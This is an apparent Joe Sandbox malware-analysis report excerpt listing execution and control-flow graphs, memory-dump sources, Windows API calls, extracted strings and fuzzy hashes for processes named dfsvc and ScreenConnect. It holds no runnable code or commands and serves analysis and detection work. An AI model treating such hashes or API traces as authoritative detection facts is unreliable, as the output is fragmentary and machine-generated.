                                                                                                                                                                                                                                                        • Instruction ID: 0b07f7f41115f13b4c6771d7344f61a5119b3f51db1b871bfdaa35232ff25c1d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86a3a226304ed89c5081f50aa56f6a2b88f7f0fb1351bbbb7a3e869969555de6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F791AE3090CB8D8FDBA9EF2888557E93BE1FF59311F04426ED84DC7292CB74A9458B91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925977816.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848e80000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925323794.00007FF848D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D6D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848d6d000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:13.6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 14638 7ff848e88414 14640 7ff848e8841d 14638->14640 14639 7ff848e88482 14640->14639 14641 7ff848e884f6 SetProcessMitigationPolicy 14640->14641 14642 7ff848e88552 14641->14642 14634 7ff848e9f219 14635 7ff848e9f223 GetTokenInformation 14634->14635 14637 7ff848e9f2d7 14635->14637 14630 7ff848e9f458 14631 7ff848e9f46f CloseHandle 14630->14631 14633 7ff848e9f4eb 14631->14633 14643 7ff848e8f67b 14644 7ff848e8f687 CreateFileW 14643->14644 14646 7ff848e8f7bc 14644->14646

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 865 7ff848e8f67b-7ff848e8f710 870 7ff848e8f712-7ff848e8f717 865->870 871 7ff848e8f71a-7ff848e8f7ba CreateFileW 865->871 870->871 873 7ff848e8f7c2-7ff848e8f7f5 871->873 874 7ff848e8f7bc 871->874 874->873
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 876 7ff848e9f219-7ff848e9f2d5 GetTokenInformation 880 7ff848e9f2d7 876->880 881 7ff848e9f2dd-7ff848e9f30e 876->881 880->881
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4114910276-0

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 883 7ff848e84982-7ff848e9f266 885 7ff848e9f26d-7ff848e9f2d5 GetTokenInformation 883->885 886 7ff848e9f2d7 885->886 887 7ff848e9f2dd-7ff848e9f30e 885->887 886->887
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCuq$
                                                                                                                                                                                                                                                        • API String ID: 0-3867085953
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q$$]q
                                                                                                                                                                                                                                                        • API String ID: 0-127220927
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: LR]q
                                                                                                                                                                                                                                                        • API String ID: 0-3081347316
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ['
                                                                                                                                                                                                                                                        • API String ID: 0-410297704
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
Memory Dump Source
• Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 08bc9eb7a742b4e84cf82b00eb3b8620c28d96388b231d400ad7d51d62f6b0fe
                                                                                                                                                                                                                                                        • Instruction ID: a158666feacfabb2562d47bc9d628b5256da79b751861ab90deb8cfe0148439d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08bc9eb7a742b4e84cf82b00eb3b8620c28d96388b231d400ad7d51d62f6b0fe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72518034E40309DFDB05EFB8D954B9DBBB6FF89304F108569E404AB294DB74A989CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e7d84be330420852b53e908b71e9c0d8ff5846f31a18a7d4bb90cb1e4813c796
                                                                                                                                                                                                                                                        • Instruction ID: 37d38b9d64aac61b88c4c8da62cc91217fae90e0a9ece0767cb96ab0cd7594cd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7d84be330420852b53e908b71e9c0d8ff5846f31a18a7d4bb90cb1e4813c796
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2413974A00705CFCF24DF29D985A6ABBF5FF84310B114A68E456D77A0EB30E946CB94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9ed5ec8502a1ca85b71535373ed25a59fb220b5d56c51e8bb2b257a5bca6494b
                                                                                                                                                                                                                                                        • Instruction ID: 51e2d7e142f0a23c0f9d773bb735844ac829172860c0ac60add38733cbe50947
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ed5ec8502a1ca85b71535373ed25a59fb220b5d56c51e8bb2b257a5bca6494b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A414B74A00705CFCB24DF29D984A6ABBF5FF84310B114A68E456D77A0EB30E946CB94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b3e6939374c7fa80ce63d5ce5533e1aacf69ed80a6f70f6843a47f37edb8560e
                                                                                                                                                                                                                                                        • Instruction ID: 9d7462010fb4263ab1555d347c2fed3127b7a29fd6b92d30074416ade8895e5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3e6939374c7fa80ce63d5ce5533e1aacf69ed80a6f70f6843a47f37edb8560e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03416730B506008FCB14DB78D994AAEBBF6EF88710B1545A9E416EB3A0DF309D05CB94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ded5438161ac823e8c61d64194ea890bace0a4b73e7522bd66721ae1b0b8521f
                                                                                                                                                                                                                                                        • Instruction ID: 5664c77fbc83320301f08bdd7837576f65e2dc016b1bbd0293018a64c1bc20ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded5438161ac823e8c61d64194ea890bace0a4b73e7522bd66721ae1b0b8521f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE319C31B102068BDB149F69C994AAFF7F6EF89314F0184AAE406E7294DF31DC018B94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f162ce420d1e519e5a1e6f07e39ae8bc25fbc44b775b54e4fbd62036972e23c8
                                                                                                                                                                                                                                                        • Instruction ID: aa35e6f395db7bba67f944745a274dfe9ab3cdec6d5e192d921fa113c50b6ce6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f162ce420d1e519e5a1e6f07e39ae8bc25fbc44b775b54e4fbd62036972e23c8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D831AE31F041168FCB04DB68C8956AEBBB6EF88310F1181A9D909EB384DF719D06C796
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2ef79f4dd1c41ad428cf78ac7b5cbd8afee0930cc3fe18a500470f2b50642bf3
                                                                                                                                                                                                                                                        • Instruction ID: 1405f812c7654eff52d210bc72150f39f1d4c63c0677aa59b523cee1fb8a8349
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ef79f4dd1c41ad428cf78ac7b5cbd8afee0930cc3fe18a500470f2b50642bf3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E314F30A00701CFC730DF29D984A66B7F2EF89325B544A1CD896DB7A4EB30E905CB95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 985cad3f966cb22eae0a88e7767baadd2da846bc416ba28617945f234aaa3a6d
                                                                                                                                                                                                                                                        • Instruction ID: 8dc5f615925384b2b3cd6664f357f6dba8bc6e64b030195fa051944942436033
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 985cad3f966cb22eae0a88e7767baadd2da846bc416ba28617945f234aaa3a6d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6219126A0E2E04FCF1397385CB16E57F749F8754474E04C6C9C8AB267C6162D0AC789
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419490259.0000000002A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A1D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a1d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1d70ee5e9c111e54a648e76d9f8a6b74477a565079892b1933675b35a605b63a
                                                                                                                                                                                                                                                        • Instruction ID: bd83a34320ce802de13387eaa889a912e4e3ab9ea46430d2e460b483b8daf748
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d70ee5e9c111e54a648e76d9f8a6b74477a565079892b1933675b35a605b63a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1801F731404B009AD7208B19C8C4B67BF98EF45374F18C429ED4A0B286C7799841C6B1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d0f11a2921eb936f42810d516275db90d6e320c1ddeba3f04e24a5658e42012e
                                                                                                                                                                                                                                                        • Instruction ID: 13fc5a4ae2a027016f61f65088f281a8519efd051b32ee9dc7605ce8b0e0db02
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f11a2921eb936f42810d516275db90d6e320c1ddeba3f04e24a5658e42012e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55015E32D00119DBCF05DFA9D9548CEBBB2EF88724F458426E405B7264DB31A916CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419490259.0000000002A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A1D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a1d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f98a884a43fa4f200fb7e9c4306bf6ae073b6915faa17bde80463971f5f2da07
                                                                                                                                                                                                                                                        • Instruction ID: 679606c483689f4fb4728ca7fc1997a2f180d4060641c6c31ed1787b83a7804f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f98a884a43fa4f200fb7e9c4306bf6ae073b6915faa17bde80463971f5f2da07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C101527140D7D09FD7128B258C94B52BFB4EF43224F1C80DBE9898F1A3C2695845C772
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d3c7b93068d18817bec2079e49e5a0b4dfec2ec6b97d710c0fd986a514e2ace2
                                                                                                                                                                                                                                                        • Instruction ID: 004b56aadcf7db6454b8e635a86c3ef0a0db3556b58019a47fa8259c9ab34c81
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3c7b93068d18817bec2079e49e5a0b4dfec2ec6b97d710c0fd986a514e2ace2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F08C77B0C2146FD728CBBAA80069BBBDECBC4224B14C07FE54DC3780E935A4018768
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a3d3d58288af05ab105593b557798433e8f99d428240e16e256a9fb5e38c4b34
                                                                                                                                                                                                                                                        • Instruction ID: ec044f964ea94b84ae7f2beed71bb25fd592fd04a25a9c00b4c7a82139052e84
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d3d58288af05ab105593b557798433e8f99d428240e16e256a9fb5e38c4b34
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90F0B4356406145FC712AA2CEEA0B5B7B9ADF84664704852DD049D7704DF34E9098BD4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8da5c02f9c02e57f9eb18b2f7e7f8815e63dd2e55bfdb5fc74d3f3d228d9ff89
                                                                                                                                                                                                                                                        • Instruction ID: 5db8a0fda12fc2f7da95c4e95bb072998042b74ac04d0f4a847f86a34971555f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8da5c02f9c02e57f9eb18b2f7e7f8815e63dd2e55bfdb5fc74d3f3d228d9ff89
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE0ED77A1C3542ED724CA6AAC02B8BBBCECBC0224F04847FA54CD2280EC28D2018325
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 26fd2aa382b540d94e4c3ea227a6aa7d38ac96f76bd66f06d5160938e16af32c
                                                                                                                                                                                                                                                        • Instruction ID: 16f563e62bda30ed52fcc84cd8f4ac55e315dcb7f0baefd0eeb6b499ea1483fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26fd2aa382b540d94e4c3ea227a6aa7d38ac96f76bd66f06d5160938e16af32c
